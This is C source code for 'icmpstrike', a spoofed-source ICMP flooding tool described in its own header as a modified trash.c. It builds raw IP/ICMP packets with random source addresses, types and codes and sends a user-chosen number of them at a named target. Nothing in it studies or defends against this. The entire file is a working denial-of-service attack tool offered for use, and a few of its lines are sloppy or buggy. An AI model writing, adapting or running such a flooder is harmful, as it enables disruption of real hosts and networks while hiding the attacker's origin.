/* This is basically a modified trash.c which has 
   random source spoofing. Fun fun silly willy..
   You can get a modified bloop.c and other such
   ICMP attacks by just modifying the ICMP header.
   By Stealth_C^ */

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <pwd.h>
#include <time.h>
#include <sys/utsname.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/igmp.h>

void banner(void) {
        
	printf("icmpstrike, floods target with random icmps\n");
	printf("By Stealth_C^\n\n");
}
void usage(const char *progname) {
	printf("use : ./icmpstrike (target) (how many)\n");
}
int resolve( const char *name, unsigned int port, struct sockaddr_in *addr ) {
	struct hostent *host;
	memset(addr,0,sizeof(struct sockaddr_in));
	addr->sin_family = AF_INET;
	addr->sin_addr.s_addr = inet_addr(name);
	if (addr->sin_addr.s_addr == -1) {
	if (( host = gethostbyname(name) ) == NULL )  {
	fprintf(stderr,"Host Unknown...\n",name);
	return(-1);
	}
	addr->sin_family = host->h_addrtype;
	memcpy((caddr_t)&addr->sin_addr,host->h_addr,host->h_length);
	}
	addr->sin_port = htons(port);
	return(0);
}
unsigned short in_cksum(addr, len)
	u_short *addr;
	int len;
{
	register int nleft = len;
	register u_short *w = addr;
	register int sum = 0;
	u_short answer = 0;
	while (nleft > 1)  {
        sum += *w++;
        nleft -= 2;
}
	if (nleft == 1) {
        *(u_char *)(&answer) = *(u_char *)w ;
        sum += answer;
}
	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);                 
	answer = ~sum;                      
	return(answer);
}
int icmp1(int socket, unsigned long spoof_addr, struct sockaddr_in *dest_addr) {
	unsigned char  *packet;
	struct iphdr   *ip;
	struct icmphdr *icmp;
	int rc;
	packet = (unsigned char *)malloc(sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);
	ip = (struct iphdr *)packet;
	icmp = (struct icmphdr *)(packet + sizeof(struct iphdr));
	memset(ip,0,sizeof(struct iphdr) + sizeof(struct icmphdr) + 8);

	ip->ihl = 5;
	ip->version = 4;
	ip->tos = 4;
	ip->id = htons(1234);
	ip->frag_off = htons(0x2000);
	ip->tot_len = 0;
	ip->ttl = 255;
	ip->protocol = IPPROTO_ICMP;
	ip->saddr = rand() % 549874540;
	ip->daddr = dest_addr->sin_addr.s_addr;
	ip->check = in_cksum(ip, sizeof(struct iphdr));

	icmp->type = rand() % 18;
	icmp->code = rand() % 15;
	icmp->checksum = in_cksum(icmp,sizeof(struct icmphdr) + 1);
	if (sendto(socket, packet, sizeof(struct iphdr) + sizeof(struct icmphdr) + 1,0, (struct sockaddr *)dest_addr, sizeof(struct sockaddr)) == -1) { return(-1); }
	free(packet);
	return(0);
}
int main(int argc, char **argv) {
	struct sockaddr_in dest_addr;
	unsigned int i,sock;
	unsigned long src_addr;
	banner();
	if ((argc != 3)) {
	usage(argv[0]);
	return(-1);
}
	if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
	fprintf(stderr,"no root, no attack..\n");
	return(-1);
}

	/*  if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); } */
	src_addr = dest_addr.sin_addr.s_addr;
	if (resolve(argv[1],0,&dest_addr) == -1) { return(-1); }
	printf("Attackin.\n",argv[0]);
	for (i = 0;i < atoi(argv[2]);i++) {
	if (icmp1(sock,rand() % 5000000,&dest_addr) == -1) {
	fprintf(stderr,"mrrh\n");
	return(-1);
      }
   }
}